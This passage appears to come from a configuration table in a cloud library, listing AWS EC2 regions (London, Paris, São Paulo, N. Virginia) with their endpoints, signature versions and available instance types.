"r5d.2xlarge",
"r5d.4xlarge",
"r5d.8xlarge",
"r5d.large",
"r5d.xlarge",
"r5dn.12xlarge",
"r5dn.16xlarge",
"r5dn.24xlarge",
"r5dn.2xlarge",
"r5dn.4xlarge",
"r5dn.8xlarge",
"r5dn.large",
"r5dn.xlarge",
"r5n.12xlarge",
"r5n.16xlarge",
"r5n.24xlarge",
"r5n.2xlarge",
"r5n.4xlarge",
"r5n.8xlarge",
"r5n.large",
"r5n.xlarge",
"r6g.12xlarge",
"r6g.16xlarge",
"r6g.2xlarge",
"r6g.4xlarge",
"r6g.8xlarge",
"r6g.large",
"r6g.medium",
"r6g.xlarge",
"r6gd.12xlarge",
"r6gd.16xlarge",
"r6gd.2xlarge",
"r6gd.4xlarge",
"r6gd.8xlarge",
"r6gd.large",
"r6gd.medium",
"r6gd.xlarge",
"r6i.12xlarge",
"r6i.16xlarge",
"r6i.24xlarge",
"r6i.2xlarge",
"r6i.32xlarge",
"r6i.4xlarge",
"r6i.8xlarge",
"r6i.large",
"r6i.xlarge",
"t1.micro",
"t2.2xlarge",
"t2.large",
"t2.medium",
"t2.micro",
"t2.nano",
"t2.small",
"t2.xlarge",
"t3.2xlarge",
"t3.large",
"t3.medium",
"t3.micro",
"t3.nano",
"t3.small",
"t3.xlarge",
"t3a.2xlarge",
"t3a.large",
"t3a.medium",
"t3a.micro",
"t3a.nano",
"t3a.small",
"t3a.xlarge",
"t4g.2xlarge",
"t4g.large",
"t4g.medium",
"t4g.micro",
"t4g.nano",
"t4g.small",
"t4g.xlarge",
"u-12tb1.112xlarge",
"u-3tb1.56xlarge",
"u-6tb1.112xlarge",
"u-6tb1.56xlarge",
"u-9tb1.112xlarge",
"vt1.24xlarge",
"vt1.3xlarge",
"vt1.6xlarge",
"x1.16xlarge",
"x1.32xlarge",
"x1e.16xlarge",
"x1e.2xlarge",
"x1e.32xlarge",
"x1e.4xlarge",
"x1e.8xlarge",
"x1e.xlarge",
"x2gd.12xlarge",
"x2gd.16xlarge",
"x2gd.2xlarge",
"x2gd.4xlarge",
"x2gd.8xlarge",
"x2gd.large",
"x2gd.medium",
"x2gd.xlarge",
"x2idn.16xlarge",
"x2idn.24xlarge",
"x2idn.32xlarge",
"x2iedn.16xlarge",
"x2iedn.24xlarge",
"x2iedn.2xlarge",
"x2iedn.32xlarge",
"x2iedn.4xlarge",
"x2iedn.8xlarge",
"x2iedn.xlarge",
"x2iezn.12xlarge",
"x2iezn.2xlarge",
"x2iezn.4xlarge",
"x2iezn.6xlarge",
"x2iezn.8xlarge",
"z1d.12xlarge",
"z1d.2xlarge",
"z1d.3xlarge",
"z1d.6xlarge",
"z1d.large",
"z1d.xlarge",
],
"signature_version": "2",
},
"eu-west-2": {
"api_name": "ec2_eu_west_london",
"country": "United Kingdom",
"endpoint": "ec2.eu-west-2.amazonaws.com",
"id": "eu-west-2",
"instance_types": [
"c4.2xlarge",
"c4.4xlarge",
"c4.8xlarge",
"c4.large",
"c4.xlarge",
"c5.12xlarge",
"c5.18xlarge",
"c5.24xlarge",
"c5.2xlarge",
"c5.4xlarge",
"c5.9xlarge",
"c5.large",
"c5.xlarge",
"c5a.12xlarge",
"c5a.16xlarge",
"c5a.24xlarge",
"c5a.2xlarge",
"c5a.4xlarge",
"c5a.8xlarge",
"c5a.large",
"c5a.xlarge",
"c5d.12xlarge",
"c5d.18xlarge",
"c5d.24xlarge",
"c5d.2xlarge",
"c5d.4xlarge",
"c5d.9xlarge",
"c5d.large",
"c5d.xlarge",
"c5n.18xlarge",
"c5n.2xlarge",
"c5n.4xlarge",
"c5n.9xlarge",
"c5n.large",
"c5n.xlarge",
"c6g.12xlarge",
"c6g.16xlarge",
"c6g.2xlarge",
"c6g.4xlarge",
"c6g.8xlarge",
"c6g.large",
"c6g.medium",
"c6g.xlarge",
"c6gd.12xlarge",
"c6gd.16xlarge",
"c6gd.2xlarge",
"c6gd.4xlarge",
"c6gd.8xlarge",
"c6gd.large",
"c6gd.medium",
"c6gd.xlarge",
"c6gn.12xlarge",
"c6gn.16xlarge",
"c6gn.2xlarge",
"c6gn.4xlarge",
"c6gn.8xlarge",
"c6gn.large",
"c6gn.medium",
"c6gn.xlarge",
"c6i.12xlarge",
"c6i.16xlarge",
"c6i.24xlarge",
"c6i.2xlarge",
"c6i.32xlarge",
"c6i.4xlarge",
"c6i.8xlarge",
"c6i.large",
"c6i.xlarge",
"d2.2xlarge",
"d2.4xlarge",
"d2.8xlarge",
"d2.xlarge",
"d3.2xlarge",
"d3.4xlarge",
"d3.8xlarge",
"d3.xlarge",
"f1.2xlarge",
"f1.4xlarge",
"g3.16xlarge",
"g3.4xlarge",
"g3.8xlarge",
"g3s.xlarge",
"g4ad.16xlarge",
"g4ad.2xlarge",
"g4ad.4xlarge",
"g4ad.8xlarge",
"g4ad.xlarge",
"g4dn.12xlarge",
"g4dn.16xlarge",
"g4dn.2xlarge",
"g4dn.4xlarge",
"g4dn.8xlarge",
"g4dn.xlarge",
"i2.large",
"i3.16xlarge",
"i3.2xlarge",
"i3.4xlarge",
"i3.8xlarge",
"i3.large",
"i3.xlarge",
"i3en.12xlarge",
"i3en.24xlarge",
"i3en.2xlarge",
"i3en.3xlarge",
"i3en.6xlarge",
"i3en.large",
"i3en.xlarge",
"inf1.24xlarge",
"inf1.2xlarge",
"inf1.6xlarge",
"inf1.xlarge",
"m4.10xlarge",
"m4.16xlarge",
"m4.2xlarge",
"m4.4xlarge",
"m4.large",
"m4.xlarge",
"m5.12xlarge",
"m5.16xlarge",
"m5.24xlarge",
"m5.2xlarge",
"m5.4xlarge",
"m5.8xlarge",
"m5.large",
"m5.xlarge",
"m5a.12xlarge",
"m5a.16xlarge",
"m5a.24xlarge",
"m5a.2xlarge",
"m5a.4xlarge",
"m5a.8xlarge",
"m5a.large",
"m5a.xlarge",
"m5ad.12xlarge",
"m5ad.16xlarge",
"m5ad.24xlarge",
"m5ad.2xlarge",
"m5ad.4xlarge",
"m5ad.8xlarge",
"m5ad.large",
"m5ad.xlarge",
"m5d.12xlarge",
"m5d.16xlarge",
"m5d.24xlarge",
"m5d.2xlarge",
"m5d.4xlarge",
"m5d.8xlarge",
"m5d.large",
"m5d.xlarge",
"m6g.12xlarge",
"m6g.16xlarge",
"m6g.2xlarge",
"m6g.4xlarge",
"m6g.8xlarge",
"m6g.large",
"m6g.medium",
"m6g.xlarge",
"m6gd.12xlarge",
"m6gd.16xlarge",
"m6gd.2xlarge",
"m6gd.4xlarge",
"m6gd.8xlarge",
"m6gd.large",
"m6gd.medium",
"m6gd.xlarge",
"m6i.12xlarge",
"m6i.16xlarge",
"m6i.24xlarge",
"m6i.2xlarge",
"m6i.32xlarge",
"m6i.4xlarge",
"m6i.8xlarge",
"m6i.large",
"m6i.xlarge",
"p3.16xlarge",
"p3.2xlarge",
"p3.8xlarge",
"r4.16xlarge",
"r4.2xlarge",
"r4.4xlarge",
"r4.8xlarge",
"r4.large",
"r4.xlarge",
"r5.12xlarge",
"r5.16xlarge",
"r5.24xlarge",
"r5.2xlarge",
"r5.4xlarge",
"r5.8xlarge",
"r5.large",
"r5.xlarge",
"r5a.12xlarge",
"r5a.16xlarge",
"r5a.24xlarge",
"r5a.2xlarge",
"r5a.4xlarge",
"r5a.8xlarge",
"r5a.large",
"r5a.xlarge",
"r5ad.12xlarge",
"r5ad.16xlarge",
"r5ad.24xlarge",
"r5ad.2xlarge",
"r5ad.4xlarge",
"r5ad.8xlarge",
"r5ad.large",
"r5ad.xlarge",
"r5b.12xlarge",
"r5b.16xlarge",
"r5b.24xlarge",
"r5b.2xlarge",
"r5b.4xlarge",
"r5b.8xlarge",
"r5b.large",
"r5b.xlarge",
"r5d.12xlarge",
"r5d.16xlarge",
"r5d.24xlarge",
"r5d.2xlarge",
"r5d.4xlarge",
"r5d.8xlarge",
"r5d.large",
"r5d.xlarge",
"r5n.12xlarge",
"r5n.16xlarge",
"r5n.24xlarge",
"r5n.2xlarge",
"r5n.4xlarge",
"r5n.8xlarge",
"r5n.large",
"r5n.xlarge",
"r6g.12xlarge",
"r6g.16xlarge",
"r6g.2xlarge",
"r6g.4xlarge",
"r6g.8xlarge",
"r6g.large",
"r6g.medium",
"r6g.xlarge",
"r6i.12xlarge",
"r6i.16xlarge",
"r6i.24xlarge",
"r6i.2xlarge",
"r6i.32xlarge",
"r6i.4xlarge",
"r6i.8xlarge",
"r6i.large",
"r6i.xlarge",
"t2.2xlarge",
"t2.large",
"t2.medium",
"t2.micro",
"t2.nano",
"t2.small",
"t2.xlarge",
"t3.2xlarge",
"t3.large",
"t3.medium",
"t3.micro",
"t3.nano",
"t3.small",
"t3.xlarge",
"t3a.2xlarge",
"t3a.large",
"t3a.medium",
"t3a.micro",
"t3a.nano",
"t3a.small",
"t3a.xlarge",
"t4g.2xlarge",
"t4g.large",
"t4g.medium",
"t4g.micro",
"t4g.nano",
"t4g.small",
"t4g.xlarge",
"x1.16xlarge",
"x1.32xlarge",
"z1d.12xlarge",
"z1d.2xlarge",
"z1d.3xlarge",
"z1d.6xlarge",
"z1d.large",
"z1d.xlarge",
],
"signature_version": "4",
},
"eu-west-3": {
"api_name": "ec2_eu_west_paris",
"country": "France",
"endpoint": "ec2.eu-west-3.amazonaws.com",
"id": "eu-west-3",
"instance_types": [
"c4.2xlarge",
"c4.4xlarge",
"c4.8xlarge",
"c4.large",
"c4.xlarge",
"c5.12xlarge",
"c5.18xlarge",
"c5.24xlarge",
"c5.2xlarge",
"c5.4xlarge",
"c5.9xlarge",
"c5.large",
"c5.xlarge",
"c5a.12xlarge",
"c5a.16xlarge",
"c5a.24xlarge",
"c5a.2xlarge",
"c5a.4xlarge",
"c5a.8xlarge",
"c5a.large",
"c5a.xlarge",
"c5d.18xlarge",
"c5d.2xlarge",
"c5d.4xlarge",
"c5d.9xlarge",
"c5d.large",
"c5d.xlarge",
"c5n.18xlarge",
"c5n.2xlarge",
"c5n.4xlarge",
"c5n.9xlarge",
"c5n.large",
"c5n.xlarge",
"c6g.12xlarge",
"c6g.16xlarge",
"c6g.2xlarge",
"c6g.4xlarge",
"c6g.8xlarge",
"c6g.large",
"c6g.medium",
"c6g.xlarge",
"c6i.12xlarge",
"c6i.16xlarge",
"c6i.24xlarge",
"c6i.2xlarge",
"c6i.32xlarge",
"c6i.4xlarge",
"c6i.8xlarge",
"c6i.large",
"c6i.xlarge",
"d2.2xlarge",
"d2.4xlarge",
"d2.8xlarge",
"d2.xlarge",
"g4dn.12xlarge",
"g4dn.16xlarge",
"g4dn.2xlarge",
"g4dn.4xlarge",
"g4dn.8xlarge",
"g4dn.xlarge",
"i3.16xlarge",
"i3.2xlarge",
"i3.4xlarge",
"i3.8xlarge",
"i3.large",
"i3.xlarge",
"i3en.12xlarge",
"i3en.24xlarge",
"i3en.2xlarge",
"i3en.3xlarge",
"i3en.6xlarge",
"i3en.large",
"i3en.xlarge",
"inf1.24xlarge",
"inf1.2xlarge",
"inf1.6xlarge",
"inf1.xlarge",
"m4.10xlarge",
"m4.16xlarge",
"m4.2xlarge",
"m4.4xlarge",
"m4.large",
"m4.xlarge",
"m5.12xlarge",
"m5.16xlarge",
"m5.24xlarge",
"m5.2xlarge",
"m5.4xlarge",
"m5.8xlarge",
"m5.large",
"m5.xlarge",
"m5a.12xlarge",
"m5a.16xlarge",
"m5a.24xlarge",
"m5a.2xlarge",
"m5a.4xlarge",
"m5a.8xlarge",
"m5a.large",
"m5a.xlarge",
"m5ad.12xlarge",
"m5ad.16xlarge",
"m5ad.24xlarge",
"m5ad.2xlarge",
"m5ad.4xlarge",
"m5ad.8xlarge",
"m5ad.large",
"m5ad.xlarge",
"m5d.12xlarge",
"m5d.16xlarge",
"m5d.24xlarge",
"m5d.2xlarge",
"m5d.4xlarge",
"m5d.8xlarge",
"m5d.large",
"m5d.xlarge",
"m6g.12xlarge",
"m6g.16xlarge",
"m6g.2xlarge",
"m6g.4xlarge",
"m6g.8xlarge",
"m6g.large",
"m6g.medium",
"m6g.xlarge",
"m6i.12xlarge",
"m6i.16xlarge",
"m6i.24xlarge",
"m6i.2xlarge",
"m6i.32xlarge",
"m6i.4xlarge",
"m6i.8xlarge",
"m6i.large",
"m6i.xlarge",
"r4.16xlarge",
"r4.2xlarge",
"r4.4xlarge",
"r4.8xlarge",
"r4.large",
"r4.xlarge",
"r5.12xlarge",
"r5.16xlarge",
"r5.24xlarge",
"r5.2xlarge",
"r5.4xlarge",
"r5.8xlarge",
"r5.large",
"r5.xlarge",
"r5a.12xlarge",
"r5a.16xlarge",
"r5a.24xlarge",
"r5a.2xlarge",
"r5a.4xlarge",
"r5a.8xlarge",
"r5a.large",
"r5a.xlarge",
"r5ad.12xlarge",
"r5ad.16xlarge",
"r5ad.24xlarge",
"r5ad.2xlarge",
"r5ad.4xlarge",
"r5ad.8xlarge",
"r5ad.large",
"r5ad.xlarge",
"r5d.12xlarge",
"r5d.16xlarge",
"r5d.24xlarge",
"r5d.2xlarge",
"r5d.4xlarge",
"r5d.8xlarge",
"r5d.large",
"r5d.xlarge",
"r5dn.12xlarge",
"r5dn.16xlarge",
"r5dn.24xlarge",
"r5dn.2xlarge",
"r5dn.4xlarge",
"r5dn.8xlarge",
"r5dn.large",
"r5dn.xlarge",
"r5n.12xlarge",
"r5n.16xlarge",
"r5n.24xlarge",
"r5n.2xlarge",
"r5n.4xlarge",
"r5n.8xlarge",
"r5n.large",
"r5n.xlarge",
"r6g.12xlarge",
"r6g.16xlarge",
"r6g.2xlarge",
"r6g.4xlarge",
"r6g.8xlarge",
"r6g.large",
"r6g.medium",
"r6g.xlarge",
"r6gd.12xlarge",
"r6gd.16xlarge",
"r6gd.2xlarge",
"r6gd.4xlarge",
"r6gd.8xlarge",
"r6gd.large",
"r6gd.medium",
"r6gd.xlarge",
"r6i.12xlarge",
"r6i.16xlarge",
"r6i.24xlarge",
"r6i.2xlarge",
"r6i.32xlarge",
"r6i.4xlarge",
"r6i.8xlarge",
"r6i.large",
"r6i.xlarge",
"t2.2xlarge",
"t2.large",
"t2.medium",
"t2.micro",
"t2.nano",
"t2.small",
"t2.xlarge",
"t3.2xlarge",
"t3.large",
"t3.medium",
"t3.micro",
"t3.nano",
"t3.small",
"t3.xlarge",
"t3a.2xlarge",
"t3a.large",
"t3a.medium",
"t3a.micro",
"t3a.nano",
"t3a.small",
"t3a.xlarge",
"t4g.2xlarge",
"t4g.large",
"t4g.medium",
"t4g.micro",
"t4g.nano",
"t4g.small",
"t4g.xlarge",
"u-6tb1.112xlarge",
"u-6tb1.56xlarge",
"x1.16xlarge",
"x1.32xlarge",
],
"signature_version": "4",
},
"sa-east-1": {
"api_name": "ec2_sa_east",
"country": "Brazil",
"endpoint": "ec2.sa-east-1.amazonaws.com",
"id": "sa-east-1",
"instance_types": [
"c1.medium",
"c1.xlarge",
"c3.2xlarge",
"c3.4xlarge",
"c3.8xlarge",
"c3.large",
"c3.xlarge",
"c4.2xlarge",
"c4.4xlarge",
"c4.8xlarge",
"c4.large",
"c4.xlarge",
"c5.12xlarge",
"c5.18xlarge",
"c5.24xlarge",
"c5.2xlarge",
"c5.4xlarge",
"c5.9xlarge",
"c5.large",
"c5.xlarge",
"c5a.12xlarge",
"c5a.16xlarge",
"c5a.24xlarge",
"c5a.2xlarge",
"c5a.4xlarge",
"c5a.8xlarge",
"c5a.large",
"c5a.xlarge",
"c5ad.12xlarge",
"c5ad.16xlarge",
"c5ad.24xlarge",
"c5ad.2xlarge",
"c5ad.4xlarge",
"c5ad.8xlarge",
"c5ad.large",
"c5ad.xlarge",
"c5d.12xlarge",
"c5d.18xlarge",
"c5d.24xlarge",
"c5d.2xlarge",
"c5d.4xlarge",
"c5d.9xlarge",
"c5d.large",
"c5d.xlarge",
"c5n.18xlarge",
"c5n.2xlarge",
"c5n.4xlarge",
"c5n.9xlarge",
"c5n.large",
"c5n.xlarge",
"c6g.12xlarge",
"c6g.16xlarge",
"c6g.2xlarge",
"c6g.4xlarge",
"c6g.8xlarge",
"c6g.large",
"c6g.medium",
"c6g.xlarge",
"c6gn.12xlarge",
"c6gn.16xlarge",
"c6gn.2xlarge",
"c6gn.4xlarge",
"c6gn.8xlarge",
"c6gn.large",
"c6gn.medium",
"c6gn.xlarge",
"c6i.12xlarge",
"c6i.16xlarge",
"c6i.24xlarge",
"c6i.2xlarge",
"c6i.32xlarge",
"c6i.4xlarge",
"c6i.8xlarge",
"c6i.large",
"c6i.xlarge",
"d2.2xlarge",
"d2.4xlarge",
"d2.8xlarge",
"d2.xlarge",
"g2.2xlarge",
"g2.8xlarge",
"g4dn.12xlarge",
"g4dn.16xlarge",
"g4dn.2xlarge",
"g4dn.4xlarge",
"g4dn.8xlarge",
"g4dn.xlarge",
"i2.2xlarge",
"i2.4xlarge",
"i2.8xlarge",
"i2.xlarge",
"i3.16xlarge",
"i3.2xlarge",
"i3.4xlarge",
"i3.8xlarge",
"i3.large",
"i3.xlarge",
"i3en.12xlarge",
"i3en.24xlarge",
"i3en.2xlarge",
"i3en.3xlarge",
"i3en.6xlarge",
"i3en.large",
"i3en.xlarge",
"inf1.24xlarge",
"inf1.2xlarge",
"inf1.6xlarge",
"inf1.xlarge",
"m1.large",
"m1.medium",
"m1.small",
"m1.xlarge",
"m2.2xlarge",
"m2.4xlarge",
"m2.xlarge",
"m3.2xlarge",
"m3.large",
"m3.medium",
"m3.xlarge",
"m4.10xlarge",
"m4.16xlarge",
"m4.2xlarge",
"m4.4xlarge",
"m4.large",
"m4.xlarge",
"m5.12xlarge",
"m5.16xlarge",
"m5.24xlarge",
"m5.2xlarge",
"m5.4xlarge",
"m5.8xlarge",
"m5.large",
"m5.xlarge",
"m5a.12xlarge",
"m5a.16xlarge",
"m5a.24xlarge",
"m5a.2xlarge",
"m5a.4xlarge",
"m5a.8xlarge",
"m5a.large",
"m5a.xlarge",
"m5ad.12xlarge",
"m5ad.16xlarge",
"m5ad.24xlarge",
"m5ad.2xlarge",
"m5ad.4xlarge",
"m5ad.8xlarge",
"m5ad.large",
"m5ad.xlarge",
"m5d.12xlarge",
"m5d.16xlarge",
"m5d.24xlarge",
"m5d.2xlarge",
"m5d.4xlarge",
"m5d.8xlarge",
"m5d.large",
"m5d.xlarge",
"m5zn.12xlarge",
"m5zn.2xlarge",
"m5zn.3xlarge",
"m5zn.6xlarge",
"m5zn.large",
"m5zn.xlarge",
"m6g.12xlarge",
"m6g.16xlarge",
"m6g.2xlarge",
"m6g.4xlarge",
"m6g.8xlarge",
"m6g.large",
"m6g.medium",
"m6g.xlarge",
"m6i.12xlarge",
"m6i.16xlarge",
"m6i.24xlarge",
"m6i.2xlarge",
"m6i.32xlarge",
"m6i.4xlarge",
"m6i.8xlarge",
"m6i.large",
"m6i.xlarge",
"r3.2xlarge",
"r3.4xlarge",
"r3.8xlarge",
"r3.large",
"r3.xlarge",
"r4.16xlarge",
"r4.2xlarge",
"r4.4xlarge",
"r4.8xlarge",
"r4.large",
"r4.xlarge",
"r5.12xlarge",
"r5.16xlarge",
"r5.24xlarge",
"r5.2xlarge",
"r5.4xlarge",
"r5.8xlarge",
"r5.large",
"r5.xlarge",
"r5a.12xlarge",
"r5a.16xlarge",
"r5a.24xlarge",
"r5a.2xlarge",
"r5a.4xlarge",
"r5a.8xlarge",
"r5a.large",
"r5a.xlarge",
"r5ad.12xlarge",
"r5ad.16xlarge",
"r5ad.24xlarge",
"r5ad.2xlarge",
"r5ad.4xlarge",
"r5ad.8xlarge",
"r5ad.large",
"r5ad.xlarge",
"r5d.12xlarge",
"r5d.16xlarge",
"r5d.24xlarge",
"r5d.2xlarge",
"r5d.4xlarge",
"r5d.8xlarge",
"r5d.large",
"r5d.xlarge",
"r5n.12xlarge",
"r5n.16xlarge",
"r5n.24xlarge",
"r5n.2xlarge",
"r5n.4xlarge",
"r5n.8xlarge",
"r5n.large",
"r5n.xlarge",
"r6g.12xlarge",
"r6g.16xlarge",
"r6g.2xlarge",
"r6g.4xlarge",
"r6g.8xlarge",
"r6g.large",
"r6g.medium",
"r6g.xlarge",
"r6gd.12xlarge",
"r6gd.16xlarge",
"r6gd.2xlarge",
"r6gd.4xlarge",
"r6gd.8xlarge",
"r6gd.large",
"r6gd.medium",
"r6gd.xlarge",
"r6i.12xlarge",
"r6i.16xlarge",
"r6i.24xlarge",
"r6i.2xlarge",
"r6i.32xlarge",
"r6i.4xlarge",
"r6i.8xlarge",
"r6i.large",
"r6i.xlarge",
"t1.micro",
"t2.2xlarge",
"t2.large",
"t2.medium",
"t2.micro",
"t2.nano",
"t2.small",
"t2.xlarge",
"t3.2xlarge",
"t3.large",
"t3.medium",
"t3.micro",
"t3.nano",
"t3.small",
"t3.xlarge",
"t3a.2xlarge",
"t3a.large",
"t3a.medium",
"t3a.micro",
"t3a.nano",
"t3a.small",
"t3a.xlarge",
"t4g.2xlarge",
"t4g.large",
"t4g.medium",
"t4g.micro",
"t4g.nano",
"t4g.small",
"t4g.xlarge",
"x1.16xlarge",
"x1.32xlarge",
"x1e.16xlarge",
"x1e.2xlarge",
"x1e.32xlarge",
"x1e.4xlarge",
"x1e.8xlarge",
"x1e.xlarge",
],
"signature_version": "2",
},
"us-east-1": {
"api_name": "ec2_us_east",
"country": "USA",
"endpoint": "ec2.us-east-1.amazonaws.com",
"id": "us-east-1",
"instance_types": [
"a1.2xlarge",
"a1.4xlarge",
"a1.large",
"a1.medium",
"a1.xlarge",
"c1.medium",
"c1.xlarge",
"c3.2xlarge",
"c3.4xlarge",
"c3.8xlarge",
"c3.large",
"c3.xlarge",
"c4.2xlarge",
"c4.4xlarge",
"c4.8xlarge",
"c4.large",
"c4.xlarge",
"c5.12xlarge",
"c5.18xlarge",
"c5.24xlarge",
"c5.2xlarge",
"c5.4xlarge",
"c5.9xlarge",
"c5.large",
"c5.xlarge",
"c5a.12xlarge",
"c5a.16xlarge",
"c5a.24xlarge",
"c5a.2xlarge",
"c5a.4xlarge",
"c5a.8xlarge",
"c5a.large",
"c5a.xlarge",
"c5ad.12xlarge",
"c5ad.16xlarge",
"c5ad.24xlarge",
"c5ad.2xlarge",
"c5ad.4xlarge",
"c5ad.8xlarge",
"c5ad.large",
"c5ad.xlarge",
"c5d.12xlarge",
"c5d.18xlarge",
"c5d.24xlarge",
"c5d.2xlarge",
"c5d.4xlarge",
"c5d.9xlarge",
"c5d.large",
"c5d.xlarge",
"c5n.18xlarge",
"c5n.2xlarge",
"c5n.4xlarge",
"c5n.9xlarge",
"c5n.large",
"c5n.xlarge",
"c6a.12xlarge",
"c6a.16xlarge",
"c6a.24xlarge",
"c6a.2xlarge",
"c6a.32xlarge",
"c6a.48xlarge",
"c6a.4xlarge",
"c6a.8xlarge",
"c6a.large",
"c6a.xlarge",
"c6g.12xlarge",
"c6g.16xlarge",
"c6g.2xlarge",
"c6g.4xlarge",
"c6g.8xlarge",
"c6g.large",
"c6g.medium",
"c6g.xlarge",
"c6gd.12xlarge",
"c6gd.16xlarge",
"c6gd.2xlarge",
"c6gd.4xlarge",
"c6gd.8xlarge",
"c6gd.large",
"c6gd.medium",
"c6gd.xlarge",
"c6gn.12xlarge",
"c6gn.16xlarge",
"c6gn.2xlarge",
"c6gn.4xlarge",
"c6gn.8xlarge",
"c6gn.large",
"c6gn.medium",
"c6gn.xlarge",
"c6i.12xlarge",
"c6i.16xlarge",
"c6i.24xlarge",
"c6i.2xlarge",
"c6i.32xlarge",
"c6i.4xlarge",
"c6i.8xlarge",
"c6i.large",
"c6i.xlarge",
"cc2.8xlarge",
"cr1.8xlarge",
"d2.2xlarge",
"d2.4xlarge",
"d2.8xlarge",
"d2.xlarge",
"d3.2xlarge",
"d3.4xlarge",
"d3.8xlarge",
"d3.xlarge",
"d3en.12xlarge",
"d3en.2xlarge",
"d3en.4xlarge",
"d3en.6xlarge",
"d3en.8xlarge",
"d3en.xlarge",
"dl1.24xlarge",
"f1.16xlarge",
"f1.2xlarge",
"f1.4xlarge",
"g2.2xlarge",
"g2.8xlarge",
"g3.16xlarge",
"g3.4xlarge",
"g3.8xlarge",
"g3s.xlarge",
"g4ad.16xlarge",
"g4ad.2xlarge",
"g4ad.4xlarge",
"g4ad.8xlarge",
"g4ad.xlarge",
"g4dn.12xlarge",
"g4dn.16xlarge",
"g4dn.2xlarge",
"g4dn.4xlarge",
"g4dn.8xlarge",
"g4dn.xlarge",
"g5.12xlarge",
"g5.16xlarge",
"g5.24xlarge",
"g5.2xlarge",
"g5.48xlarge",
"g5.4xlarge",
"g5.8xlarge",
"g5.xlarge",
"g5g.16xlarge",
"g5g.2xlarge",
"g5g.4xlarge",
"g5g.8xlarge",
"g5g.xlarge",
"h1.16xlarge",
"h1.2xlarge",
"h1.4xlarge",
"h1.8xlarge",
"hs1.8xlarge",
"i2.2xlarge",
"i2.4xlarge",
"i2.8xlarge",
"i2.large",
"i2.xlarge",
"i3.16xlarge",
"i3.2xlarge",
"i3.4xlarge",
"i3.8xlarge",
"i3.large",
"i3.xlarge",
"i3en.12xlarge",
"i3en.24xlarge",
"i3en.2xlarge",
"i3en.3xlarge",
"i3en.6xlarge",
"i3en.large",
"i3en.xlarge",
"i4i.16xlarge",
"i4i.2xlarge",
"i4i.32xlarge",
"i4i.4xlarge",
"i4i.8xlarge",
"i4i.large",
"i4i.xlarge",
"im4gn.16xlarge",
"im4gn.2xlarge",
"im4gn.4xlarge",
"im4gn.8xlarge",
"im4gn.large",
"im4gn.xlarge",
"inf1.24xlarge",
"inf1.2xlarge",
"inf1.6xlarge",
"inf1.xlarge",
"is4gen.2xlarge",
"is4gen.4xlarge",
"is4gen.8xlarge",
"is4gen.large",
"is4gen.medium",
"is4gen.xlarge",
"m1.large",
"m1.medium",
"m1.small",
"m1.xlarge",
"m2.2xlarge",
"m2.4xlarge",
"m2.xlarge",
"m3.2xlarge",
"m3.large",
"m3.medium",
"m3.xlarge",
"m4.10xlarge",
"m4.16xlarge",
"m4.2xlarge",
"m4.4xlarge",
"m4.large",
"m4.xlarge",
"m5.12xlarge",
"m5.16xlarge",
"m5.24xlarge",
"m5.2xlarge",
"m5.4xlarge",
"m5.8xlarge",
"m5.large",
"m5.xlarge",
"m5a.12xlarge",
"m5a.16xlarge",
"m5a.24xlarge",
"m5a.2xlarge",
"m5a.4xlarge",
"m5a.8xlarge",
"m5a.large",
"m5a.xlarge",
"m5ad.12xlarge",
"m5ad.16xlarge",
"m5ad.24xlarge",
"m5ad.2xlarge",
"m5ad.4xlarge",
"m5ad.8xlarge",
"m5ad.large",
"m5ad.xlarge",
"m5d.12xlarge",
"m5d.16xlarge",
"m5d.24xlarge",
"m5d.2xlarge",
"m5d.4xlarge",
"m5d.8xlarge",
"m5d.large",
"m5d.xlarge",
"m5dn.12xlarge",
"m5dn.16xlarge",
"m5dn.24xlarge",
"m5dn.2xlarge",
"m5dn.4xlarge",
"m5dn.8xlarge",
"m5dn.large",
"m5dn.xlarge",
"m5n.12xlarge",
"m5n.16xlarge",
"m5n.24xlarge",
"m5n.2xlarge",
"m5n.4xlarge",
"m5n.8xlarge",
"m5n.large",
"m5n.xlarge",
"m5zn.12xlarge",
"m5zn.2xlarge",
"m5zn.3xlarge",
"m5zn.6xlarge",
"m5zn.large",
"m5zn.xlarge",
"m6a.12xlarge",
"m6a.16xlarge",
"m6a.24xlarge",
"m6a.2xlarge",
"m6a.32xlarge",
"m6a.48xlarge",
"m6a.4xlarge",
"m6a.8xlarge",
"m6a.large",
"m6a.xlarge",
"m6g.12xlarge",
"m6g.16xlarge",
"m6g.2xlarge",
"m6g.4xlarge",
"m6g.8xlarge",
"m6g.large",
"m6g.medium",
"m6g.xlarge",
"m6gd.12xlarge",
"m6gd.16xlarge",
"m6gd.2xlarge",
"m6gd.4xlarge",
"m6gd.8xlarge",
"m6gd.large",
"m6gd.medium",
"m6gd.xlarge",
"m6i.12xlarge",
"m6i.16xlarge",
"m6i.24xlarge",
"m6i.2xlarge",
"m6i.32xlarge",
"m6i.4xlarge",
"m6i.8xlarge",
"m6i.large",
"m6i.xlarge",
"p2.16xlarge",
"p2.8xlarge",
"p2.xlarge",
"p3.16xlarge",
"p3.2xlarge",
"p3.8xlarge",
"p3dn.24xlarge",
"p4d.24xlarge",
"r3.2xlarge",
"r3.4xlarge",
"r3.8xlarge",
"r3.large",
"r3.xlarge",
"r4.16xlarge",
"r4.2xlarge",
"r4.4xlarge",
"r4.8xlarge",
"r4.large",
"r4.xlarge",
"r5.12xlarge",
"r5.16xlarge",
"r5.24xlarge",
"r5.2xlarge",
"r5.4xlarge",
"r5.8xlarge",
"r5.large",
"r5.xlarge",
"r5a.12xlarge",
"r5a.16xlarge",
"r5a.24xlarge",
"r5a.2xlarge",
"r5a.4xlarge",
"r5a.8xlarge",
"r5a.large",
"r5a.xlarge",
"r5ad.12xlarge",
"r5ad.16xlarge",
"r5ad.24xlarge",
"r5ad.2xlarge",
"r5ad.4xlarge",
"r5ad.8xlarge",
"r5ad.large",
"r5ad.xlarge",
"r5b.12xlarge",
"r5b.16xlarge",
"r5b.24xlarge",
"r5b.2xlarge",
"r5b.4xlarge",
"r5b.8xlarge",
"r5b.large",
"r5b.xlarge",
"r5d.12xlarge",
"r5d.16xlarge",
"r5d.24xlarge",
"r5d.2xlarge",
"r5d.4xlarge",
"r5d.8xlarge",
"r5d.large",
"r5d.xlarge",
"r5dn.12xlarge",
"r5dn.16xlarge",
"r5dn.24xlarge",
"r5dn.2xlarge",
"r5dn.4xlarge",
"r5dn.8xlarge",
"r5dn.large",
"r5dn.xlarge",
"r5n.12xlarge",
"r5n.16xlarge",
"r5n.24xlarge",
"r5n.2xlarge",
"r5n.4xlarge",
"r5n.8xlarge",
"r5n.large",
"r5n.xlarge",
"r6g.12xlarge",
